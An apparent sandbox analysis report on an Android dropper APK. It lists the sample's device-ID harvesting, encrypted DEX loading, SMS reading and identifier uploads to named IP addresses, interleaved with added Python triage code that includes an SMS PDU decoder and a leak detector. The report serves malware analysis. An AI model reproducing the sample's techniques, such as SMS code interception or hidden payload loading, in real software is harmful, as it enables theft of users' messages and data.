Source: com.appsflyer.j;->toMD5:19API Call: java.security.MessageDigest.digest
Source: com.appsflyer.j;->toSHA1:35API Call: java.security.MessageDigest.digest
Source: com.appsflyer.j;->toSha256:46API Call: java.security.MessageDigest.getInstance
Source: com.appsflyer.j;->toSha256:48API Call: java.security.MessageDigest.update
Source: com.appsflyer.j;->toSha256:49API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.common.zzr;->getErrorMessage:10API Call: java.security.MessageDigest.digest
Source: com.google.firebase.iid.zzw;->zzb:6API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.iid.InstanceID;->zza:24API Call: java.security.MessageDigest.getInstance
Source: com.google.android.gms.iid.InstanceID;->zza:25API Call: java.security.MessageDigest.digest
Source: core.com.packed.CryptoUtils;->doCrypto:25API Call: javax.crypto.Cipher.init
Source: com.google.android.gms.common.util.zza;->zzeq:1API Call: java.security.MessageDigest.getInstance

Malware Analysis System Evasion:

Accesses /proc
Source: Lcom/google/android/gms/common/util/zzu;->zzci(I)Ljava/lang/String;Method string: "/proc/"
Source: Lcom/google/android/gms/common/util/zzu;->zzany()Ljava/lang/String;Method string: "/proc/3416/cmdline"
Source: Lutils/packed/com/components/injects/processes_lib/AndroidProcesses;->isProcessInfoHidden()ZMethod string: "/proc/mounts"
Accesses Android OS build fields
Source: utils.packed.com.utils.CommonUtils;->getDeviceFullName:2Field Access: android.os.Build.MANUFACTURER
Source: utils.packed.com.utils.CommonUtils;->getDeviceFullName:3Field Access: android.os.Build.MODEL
Source: com.appsflyer.a;->getAmazonAID:187Field Access: android.os.Build.MANUFACTURER
Source: com.appsflyer.AppsFlyerLib;->getEventParameters:1163Field Access: android.os.Build.BRAND
Source: com.appsflyer.AppsFlyerLib;->getEventParameters:1166Field Access: android.os.Build.DEVICE
Source: com.appsflyer.AppsFlyerLib;->getEventParameters:1169Field Access: android.os.Build.PRODUCT
Source: com.appsflyer.AppsFlyerLib;->getEventParameters:1175Field Access: android.os.Build.MODEL
Source: com.appsflyer.AppsFlyerLib;->getEventParameters:1178Field Access: android.os.Build.TYPE
Source: com.appsflyer.AppsFlyerLib;->getUniquePsuedoID:1542Field Access: android.os.Build.BOARD
Source: com.appsflyer.AppsFlyerLib;->getUniquePsuedoID:1545Field Access: android.os.Build.BRAND
Source: com.appsflyer.AppsFlyerLib;->getUniquePsuedoID:1548Field Access: android.os.Build.CPU_ABI
Source: com.appsflyer.AppsFlyerLib;->getUniquePsuedoID:1551Field Access: android.os.Build.DEVICE
Source: com.appsflyer.AppsFlyerLib;->getUniquePsuedoID:1554Field Access: android.os.Build.MANUFACTURER
Source: com.appsflyer.AppsFlyerLib;->getUniquePsuedoID:1557Field Access: android.os.Build.MODEL
Source: com.appsflyer.AppsFlyerLib;->getUniquePsuedoID:1560Field Access: android.os.Build.PRODUCT
Source: com.appsflyer.l;->loadStaticData:89Field Access: android.os.Build.BRAND
Source: com.appsflyer.l;->loadStaticData:90Field Access: android.os.Build.MODEL
Source: com.appsflyer.l;->loadStaticData:91Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.common.zzs;->zzci:115Field Access: android.os.Build.TYPE
Source: com.google.android.gms.internal.zzcju;->zzbbi:99Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.internal.zzckj;->zzc:807Field Access: android.os.Build.MODEL
Source: com.google.android.gms.internal.zzckj;->zzc:810Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.internal.zzckj;->start:1703Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.internal.zzckj;->zza:1880Field Access: android.os.Build.MODEL
Source: com.google.android.gms.internal.zzckj;->zza:1883Field Access: android.os.Build$VERSION.RELEASE
Checks partitions
Source: Lutils/packed/com/components/injects/processes_lib/AndroidProcesses;->isProcessInfoHidden()ZMethod string: "/proc/mounts"
Source: Lutils/packed/com/components/injects/processes_lib/AndroidProcesses;->isProcessInfoHidden()ZMethod string: "Error reading /proc/mounts. Checking if UID \'readproc\' exists."
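The two strings above come from the bundled process-listing library deciding whether /proc is readable. Since Android 7, /proc is mounted with hidepid=2, so an app sees only its own processes and the library falls back to other sources (the "readproc" group it mentions). The check below, added here as an example and not code from the sample or from that library, reproduces that decision over constructed /proc/mounts lines; the option-name mapping follows proc(5).

```python
# /proc mount-option check, added for this report; not code from the sample or
# from the process-listing library it bundles. On Android 7+ /proc carries
# hidepid=2, so other UIDs' /proc/<pid> entries are invisible to a normal app.
# The mount lines at the bottom are constructed, not taken from the analysis VM.

HIDEPID_NAMES = {"off": 0, "noaccess": 1, "invisible": 2, "ptraceable": 4}  # proc(5), Linux 5.8+


def parse_proc_mounts(text):
    """Yield (device, mountpoint, fstype, options-dict) for each /proc/mounts line."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        opts = {}
        for opt in parts[3].split(","):
            key, _, val = opt.partition("=")
            opts[key] = val if val else True
        yield parts[0], parts[1], parts[2], opts


def proc_hidepid_level(text):
    """hidepid level of the /proc mount: 0 (all visible) up to 4; 0 when absent or malformed."""
    for _dev, mnt, fstype, opts in parse_proc_mounts(text):
        if mnt == "/proc" and fstype == "proc":
            raw = opts.get("hidepid", 0)
            if raw is True:            # "hidepid" given with no value
                return 0
            if isinstance(raw, str) and raw in HIDEPID_NAMES:
                return HIDEPID_NAMES[raw]
            try:
                return int(raw)
            except ValueError:
                return 0
    return 0


def process_info_hidden(text):
    """True when other UIDs' /proc/<pid> directories are invisible, as on Android 7+."""
    return proc_hidepid_level(text) >= 2


# Constructed samples: an older Android (everything visible) and Android 7+,
# where gid=3009 is the readproc group that may still read other processes.
MOUNTS_OPEN = "proc /proc proc rw,relatime 0 0\n/dev/block/dm-0 /data ext4 rw,nosuid 0 0\n"
MOUNTS_HIDDEN = "proc /proc proc rw,relatime,gid=3009,hidepid=2 0 0\n/dev/block/dm-0 /data ext4 rw 0 0\n"
```

On the Android 6.0 analysis system used here the first form applies, which is why the sample's process enumeration succeeded; on a current device the same code path returns the fallback.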
Potential date-aware sample found
Source: webteam.displ.com.MyApp;->isFullVersion:9API Call: java.util.Date.after
Source: utils.packed.com.shared.SdkBuilder;->buildUtils:23API Call: java.util.Date.after
Queries several items of sensitive phone information
Source: Lcom/appsflyer/l;->setDeviceData(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)VMethod string: "android"
Source: Lutils/packed/com/components/injects/processes_lib/models/AndroidAppProcess;-><init>(I)VMethod string: "cpu"
Source: Lcom/google/android/gms/iid/InstanceID;->getToken(Ljava/lang/String;Ljava/lang/String;Landroid/os/Bundle;)Ljava/lang/String;Method string: "type"
Source: Lcom/appsflyer/cache/RequestCacheData;-><init>([C)VMethod string: "version"
Source: Lutils/packed/com/components/CountryCodeComponent;->prepareDeviceInfo(Ljava/util/Map;)VMethod string: "phone"
Source: Lcom/appsflyer/AppsFlyerLib;->getAppId()Ljava/lang/String;Method string: "appid"
Source: Lcom/appsflyer/l;->setDeviceData(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)VMethod string: "imei"
Source: Lcom/appsflyer/l;->setDeviceData(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)VMethod string: "model"
Source: Lcom/appsflyer/AppsFlyerLib;->monitor(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)VMethod string: "sdk"
Source: Lcom/appsflyer/l;->setDeviceData(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)VMethod string: "brand"
Queries the unique operating system id (ANDROID_ID)
Source: utils.packed.com.utils.CommonUtils;->getDeviceId:20API Call: android.provider.Settings.Secure.getString
Source: com.appsflyer.AppsFlyerLib;->addDeviceTracking:104API Call: android.provider.Settings.Secure.getString
Source: com.google.android.gms.internal.zzckj;->zzc:790API Call: android.provider.Settings$Secure.getString

HIPS / PFW / Operating System Protection Evasion:

Uses the DexClassLoader (dynamic code loading, often used to run a dropped payload)
Source: webteam.displ.com.MyApp$Helper;-><init>:17API Call: dalvik.system.DexClassLoader.<init>("/data/user/0/com.antonsilin.android.apps/app_dex/loader-packed(4-2-1).encrypted")
Source: webteam.displ.com.MyApp$Helper;->loadBuilder:23API Call: dalvik.system.DexClassLoader.loadClass("utils.packed.com.shared.SdkBuilder")
Source: webteam.displ.com.MyApp$Helper;->loadBuilder:28API Call: dalvik.system.DexClassLoader.loadClass("utils.packed.com.shared.FcmToSdkCallbackImpl")
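The file handed to DexClassLoader above is named loader-packed(4-2-1).encrypted and is decrypted by core.com.packed.CryptoUtils.doCrypto before loading, so what sits in app_dex/ on disk is not a DEX until the sample has run. The triage routine below, added here as an example and not code from the sample or from Joe Sandbox, classifies such a dropped blob by magic bytes and, failing that, by Shannon entropy, so an analyst can tell a ready-to-load DEX or JAR from an encrypted stage. The sample blobs are constructed inline and the entropy threshold is an assumption, a rule of thumb rather than a value from this report.

```python
# Dropped-payload triage, added for this report; not code from the sample or
# from Joe Sandbox. Classifies a blob by magic bytes (DEX/ODEX/ZIP/ELF) and,
# when none match, by entropy, to separate plain code from encrypted stages.
import math
import random
from collections import Counter

MAGICS = [
    (b"dex\n", "dex"),
    (b"dey\n", "odex"),
    (b"PK\x03\x04", "zip"),        # DexClassLoader also accepts .jar/.apk containers
    (b"\x7fELF", "elf"),
]
ENCRYPTED_ENTROPY = 7.5  # bits per byte; assumed threshold for "encrypted or compressed"


def shannon_entropy(data):
    """Bits of entropy per byte: 0.0 for empty or constant input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify_payload(data):
    """Return the kind, the DEX version string if any, and the entropy used for the call."""
    entropy = round(shannon_entropy(data), 3)
    for magic, kind in MAGICS:
        if data.startswith(magic):
            version = data[4:7].decode("ascii", "replace") if kind in ("dex", "odex") else ""
            return {"kind": kind, "version": version, "entropy": entropy}
    kind = "encrypted_or_compressed" if entropy >= ENCRYPTED_ENTROPY else "unknown"
    return {"kind": kind, "version": "", "entropy": entropy}


def fake_dex(size=4096):
    """Constructed sample: DEX magic and version 035 followed by low-entropy filler."""
    return (b"dex\n035\0" + bytes(range(64)) * (size // 64))[:size]


def fake_encrypted(size=8192, seed=1):
    """Constructed sample: deterministic pseudo-random bytes standing in for ciphertext."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(size))


def triage(entries):
    """entries: {filename: bytes}, e.g. the contents of app_dex/; returns filename -> classification."""
    return {name: classify_payload(blob) for name, blob in entries.items()}
```

Run this over app_dex/ both before and after letting the sample execute: the encrypted stage should classify as high-entropy, and only after doCrypto has run (or after you decrypt it yourself with the key recovered from CryptoUtils) should a "dex" result appear.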

Language, Device and Operating System Detection:

Queries the SIM provider name (SPN - Service Provider Name)
Source: com.appsflyer.AppsFlyerLib;->getEventParameters:1341API Call: android.telephony.TelephonyManager.getSimOperatorName returned ""
Queries the network operator ISO country code
Source: utils.packed.com.components.CountryCodeComponent;->prepareDeviceInfo:5API Call: android.telephony.TelephonyManager.getNetworkCountryIso returned ""
Queries the network operator name
Source: com.appsflyer.AppsFlyerLib;->getEventParameters:1344API Call: android.telephony.TelephonyManager.getNetworkOperatorName returned "Swisscom Ltd"

Stealing of Sensitive Information:

Uploads sensitive phone information to the internet (privacy leak)
Source: 192.168.1.34:33816 -> 54.38.92.92:80HTTP traffic detected: Header contains sensitive information: dee2cdd8a7942efa (Secure.ANDROID_ID)
Source: 192.168.1.34:45149 -> 178.132.78.51:84HTTP traffic detected: Header contains sensitive information: dee2cdd8a7942efa (Secure.ANDROID_ID)
Source: 192.168.1.34:45149 -> 178.132.78.51:84HTTP traffic detected: Header contains sensitive information: Galaxy Nexus (android.os.Build.USER)
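The three hits above are the sandbox matching device values it had seeded (the ANDROID_ID dee2cdd8a7942efa and the device name) against outbound HTTP headers, one of them on port 84, the non-standard port flagged earlier. The routine below, added here as an example and not code from the sample or from Joe Sandbox, applies the same idea to requests you have already extracted from a capture: it looks for known identifier values and ANDROID_ID-shaped tokens in URLs and headers and flags HTTP on ports outside an assumed standard set. The requests are constructed to resemble the two destinations in this report; the paths and header names are assumptions, not observed traffic.

```python
# Identifier-leak and odd-port triage over extracted HTTP requests. Added example
# for this report; not code from the sample or from Joe Sandbox. Requests below
# are constructed (paths and header names are assumptions, not captured data).
import re
from dataclasses import dataclass, field

HTTP_PORTS = {80, 443, 8000, 8080, 8443}      # assumption: what we treat as "standard"
ANDROID_ID_RE = re.compile(r"\b[0-9a-f]{16}\b")  # Settings.Secure.ANDROID_ID is 64 bits as hex


@dataclass
class Request:
    src: str
    dst: str
    dport: int
    method: str
    path: str
    headers: dict = field(default_factory=dict)


def find_identifier_leaks(req, known_values):
    """Return (where, what) pairs for each known identifier or ANDROID_ID-shaped token seen."""
    hits = []
    fields = [("url", req.path)] + [(f"header:{k}", v) for k, v in req.headers.items()]
    for where, text in fields:
        for name, value in known_values.items():
            if value and value in text:
                hits.append((where, name))
        for token in ANDROID_ID_RE.findall(text):
            if token not in known_values.values():      # unknown but ANDROID_ID-shaped: still worth a look
                hits.append((where, f"android_id_shape:{token}"))
    return hits


def nonstandard_http_port(req):
    return req.dport not in HTTP_PORTS


def triage(requests, known_values):
    """One finding per request that leaks an identifier or uses an unusual port."""
    findings = []
    for r in requests:
        leaks = find_identifier_leaks(r, known_values)
        odd_port = nonstandard_http_port(r)
        if leaks or odd_port:
            findings.append({"dst": f"{r.dst}:{r.dport}", "leaks": leaks,
                             "nonstandard_port": odd_port})
    return findings


# Values the sandbox seeded on the analysis device (from this report).
KNOWN = {"android_id": "dee2cdd8a7942efa", "model": "Galaxy Nexus"}

# Constructed traffic modelled on the two destinations above plus a clean request.
SAMPLE = [
    Request("192.168.1.34", "54.38.92.92", 80, "GET", "/api/config",
            {"Host": "example.invalid", "X-Device": "dee2cdd8a7942efa"}),
    Request("192.168.1.34", "178.132.78.51", 84, "POST", "/upload",
            {"Host": "178.132.78.51:84", "User-Agent": "Galaxy Nexus", "X-Id": "dee2cdd8a7942efa"}),
    Request("192.168.1.34", "93.184.216.34", 443, "GET", "/", {"Host": "example.invalid"}),
]
```

Seeding the device with known, unique identifier values before detonation is what makes this kind of match reliable; a bare regex on 16 hex digits alone will also fire on hashes and session tokens, which is why the shape-only hits are reported separately.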
Creates SMS message objects from raw PDUs
Source: utils.packed.com.components.TextComponent;->readSmsTextOldApi:39API Call: android.telephony.SmsMessage.createFromPdu
Parses SMS data (e.g. originating address)
Source: utils.packed.com.components.TextComponent;->readSmsTextNewApi:23API Call: android.telephony.SmsMessage.getOriginatingAddress
Source: utils.packed.com.components.TextComponent;->readSmsTextNewApi:24API Call: android.telephony.SmsMessage.getMessageBody
Source: utils.packed.com.components.TextComponent;->readSmsTextNewApi:27API Call: android.telephony.SmsMessage.getMessageBody
Source: utils.packed.com.components.TextComponent;->readSmsTextOldApi:40API Call: android.telephony.SmsMessage.getOriginatingAddress
Source: utils.packed.com.components.TextComponent;->readSmsTextOldApi:41API Call: android.telephony.SmsMessage.getMessageBody
Source: utils.packed.com.components.TextComponent;->readSmsTextOldApi:44API Call: android.telephony.SmsMessage.getMessageBody
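The readSmsTextOldApi path above takes the raw "pdus" from an SMS_RECEIVED broadcast, calls SmsMessage.createFromPdu and then reads the originating address and body, which is the classic way to intercept one-time codes. The decoder below, added here as an example and not code from the sample or from Android, performs the same decoding for GSM 03.40 SMS-DELIVER PDUs with the 7-bit default alphabet or 8-bit data, so a PDU pulled from a logcat line or a memory dump can be read without a device. The 7-bit PDU is a widely published textbook example and the 8-bit one is constructed; neither is traffic from this sample. UCS-2 bodies and user-data headers (concatenated messages) are rejected rather than decoded.

```python
# SMS-DELIVER PDU decoder (GSM 03.40), added for this report; not code from the
# sample or from Android. Equivalent to createFromPdu() followed by
# getOriginatingAddress()/getMessageBody() for the 7-bit and 8-bit alphabets.

# GSM 7-bit default alphabet; index == septet value (128 entries, no extension table).
GSM7 = (
    "@£$¥èéùìòÇ\nØø\rÅå"
    "Δ_ΦΓΛΩΠΨΣΘΞ\x1bÆæßÉ"
    " !\"#¤%&'()*+,-./"
    "0123456789:;<=>?"
    "¡ABCDEFGHIJKLMNOPQRSTUVWXYZÄÖÑÜ§"
    "¿abcdefghijklmnopqrstuvwxyzäöñüà"
)


def _swap_nibbles(hexstr):
    """Semi-octet digits are stored low nibble first: '13 46' encodes '31 64'."""
    return "".join(hexstr[i + 1] + hexstr[i] for i in range(0, len(hexstr), 2))


def _decode_address(octets, ndigits, toa):
    """Digits of an address, with '+' when the type-of-address is international (0x91)."""
    digits = _swap_nibbles(octets.hex().upper())[:ndigits].rstrip("F")
    return ("+" if (toa & 0x70) == 0x10 else "") + digits


def _unpack_7bit(data, nseptets):
    """Septets are packed LSB-first across octets; read them back 7 bits at a time."""
    bits = int.from_bytes(data, "little")
    return "".join(GSM7[(bits >> (7 * i)) & 0x7F] for i in range(nseptets))


def decode_sms_deliver(pdu_hex):
    """Decode one SMS-DELIVER PDU as carried in the SMS_RECEIVED 'pdus' extra."""
    b = bytes.fromhex(pdu_hex)
    smsc_len = b[0]
    pos = 1
    smsc = ""
    if smsc_len:                      # SMSC field: length, type-of-address, digits
        smsc = _decode_address(b[pos + 1:pos + smsc_len], (smsc_len - 1) * 2, b[pos])
        pos += smsc_len
    first = b[pos]
    pos += 1
    if first & 0x03 != 0x00:
        raise ValueError("TP-MTI is not SMS-DELIVER")
    if first & 0x40:
        raise ValueError("TP-UDHI set: user data header (e.g. concatenation) not handled")
    ndigits, toa = b[pos], b[pos + 1]
    pos += 2
    nocts = (ndigits + 1) // 2
    sender = _decode_address(b[pos:pos + nocts], ndigits, toa)
    pos += nocts
    pid, dcs = b[pos], b[pos + 1]
    pos += 2
    ts = _swap_nibbles(b[pos:pos + 7].hex())
    pos += 7
    # TP-SCTS is YY MM DD hh mm ss in SMSC-local time; the time-zone semi-octet is left undecoded.
    timestamp = f"{ts[0:2]}-{ts[2:4]}-{ts[4:6]} {ts[6:8]}:{ts[8:10]}:{ts[10:12]}"
    udl = b[pos]
    pos += 1
    ud = b[pos:]
    if dcs & 0xC0:
        raise ValueError(f"DCS 0x{dcs:02x}: only the general data coding group is handled")
    alphabet = (dcs >> 2) & 0x03      # 0 = GSM 7-bit, 1 = 8-bit data, 2 = UCS-2
    if alphabet == 0:
        body = _unpack_7bit(ud, udl)  # udl counts septets
    elif alphabet == 1:
        body = ud[:udl].decode("latin-1")
    else:
        raise ValueError("UCS-2 body not handled")
    return {"smsc": smsc, "sender": sender, "timestamp": timestamp,
            "pid": pid, "dcs": dcs, "body": body}


# Public textbook PDU (7-bit body), not traffic from this sample.
EXAMPLE_7BIT = "07911326040000F0040B911346610089F60000208062917314080CC8F71D14969741F977FD07"
# Constructed 8-bit (DCS 0x04) PDU with no SMSC field and a national sender.
EXAMPLE_8BIT = "00040A81214365870900042080629173140803414243"
```

Anything this returns is exactly what the sample's TextComponent gets to forward, so when reviewing its network output look for the sender and body strings rather than for the PDU hex.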
Queries list of installed packages
Source: utils.packed.com.components.injects.InjectComponent;->getInstalledApps:6API Call: android.content.pm.PackageManager.getInstalledPackages
Queries stored mail and application accounts (e.g. Gmail or WhatsApp)
Source: com.google.android.gms.common.internal.zzr;->getAccountName:20API Call: android.accounts.Account.name
Source: com.google.android.gms.internal.zzcyt;->zza:58API Call: android.accounts.Account.name
Source: com.google.android.gms.auth.api.signin.GoogleSignInAccount;->zzacd:71API Call: android.accounts.Account.name
Source: com.google.android.gms.auth.api.signin.GoogleSignInAccount;->zzacd:73API Call: android.accounts.Account.name
Source: com.google.android.gms.auth.api.signin.GoogleSignInOptions;->toJsonObject:42API Call: android.accounts.Account.name

Antivirus Detection

Initial Sample

Source | Detection | Scanner | Label | Link
com.antonsilin.android.apps-v3.0.0.apk | 100% | Avira | ANDROID/Dropper.FNDZ.Gen | 

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Screenshots

Thumbnails
